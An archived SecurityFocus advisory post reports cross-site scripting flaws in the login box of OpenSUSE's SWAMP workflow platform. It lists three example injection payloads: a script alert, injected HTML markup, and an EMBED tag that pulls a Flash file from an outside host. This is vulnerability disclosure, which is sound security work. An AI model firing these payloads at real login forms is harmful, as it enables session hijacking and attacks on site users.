Novell OpenSUSE SWAMP multiple XSS Oct 24 2007 12:02AM
morin josh gmail com
Vendor Site: http://en.opensuse.org/Swamp

Version affected: ???

Demo:http://swampdemo.suse.de/webswamp/swamp/template/Index.vm

Class: Input Validation Error

Overview:OpenSUSE Workflow Administration and Management Platform login page fails to sufficiently sanitize user-supplied input data via login box.

Example:

1.<script>alert('xss')</script>

2.<html><font color="Red"><b>XSS</b></font></html>

3.<EMBED SRC="http://site.com/xss.swf"

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus